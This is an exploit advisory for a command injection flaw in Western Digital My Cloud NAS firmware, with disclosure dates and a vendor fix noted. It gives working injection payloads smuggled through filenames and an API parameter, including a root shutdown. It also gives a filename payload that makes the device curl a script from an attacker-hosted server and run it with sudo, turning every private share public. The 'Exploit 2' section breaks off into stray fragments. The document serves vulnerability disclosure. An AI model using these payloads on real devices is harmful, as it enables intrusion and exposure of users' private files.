# Exploit Title: Western Digital My Cloud Command Injection # Vendor Homepage: http://www.wdc.com # Firmware tested: 04.01.03-421 and 04.01.04-422 for the Personal Cloud devices # Firmware link: http://download.wdc.com/nas/sq-040104-422-20150423.deb.zip # Exploit Author: James Sibley (absane) ; twitter = @ab5ane # Blog post: http://versprite.com/og/command-injection-in-the-wd-my-cloud-nas/ # Discovery date: May 10 2015 # Vendor notified: May 12 2015 # Vendor fixed: September 2015 with rolling updates # Vendor advisory: http://community.wd.com/t5/My-Cloud/Potential-Security-Vulnerabilities-with-My-Cloud-Personal-Cloud/td-p/898578 ======================= | Overview | ======================= The function "exec_runtime", defined in /var/www/restapi/api/Core/init_autoloader.php, executes programs and scripts on the Linux-based WD My Cloud NAS through the PHP "exec" function. In many instances, user input makes its way into the "exec" function without proper validation and sanitization. Because of this, attackers can hijack the command flow and execute arbitrary commands in the context of the user www-data. The www-data user has unrestricted sudo access so escalating to root and therefore compromising the device is trivial. This was discovered in the "My Cloud Personal Cloud" device but other models may be affected. ======================= | Proof of Concepts | ======================= There are two ways to show this: Method 1) Using the client application ("WD My Cloud Desktop") upload 2GB file with the following name: $(sudo shutdown -h now).txt Method 2) a) Authenticate as the administrator @ http://wdmycloud:80 b) Open the following path: /api/1.0/rest/safepoint_getstatus?handle=$(sudo shutdown -h now)&action=update In both PoCs, observe that the device powers off. ======================= | Exploit 1 | ======================= This exploit will make all private folders public. A video demo is in the blog. 1) On a webserver host the following as index.html: #!/bin/bash while read share; do echo UPDATE UserShares SET public_access=\"true\" WHERE share_name=\"$share\"";" | sqlite3 /usr/local/nas/orion/orion.db; done < <(bash /usr/local/sbin/getShares.sh private) 2) Upload a 2GB file to the WD My Cloud NAS with the client application ("WD My Cloud Desktop"). Use the following name: $(sudo curl 192.168.0.226 -o makeAllPublic.sh && sudo bash makeAllPublic.sh).txt 3) After the file uploads, refresh the file list. ======================= | Exploit 2 | ======================= "; echo "
"; echo "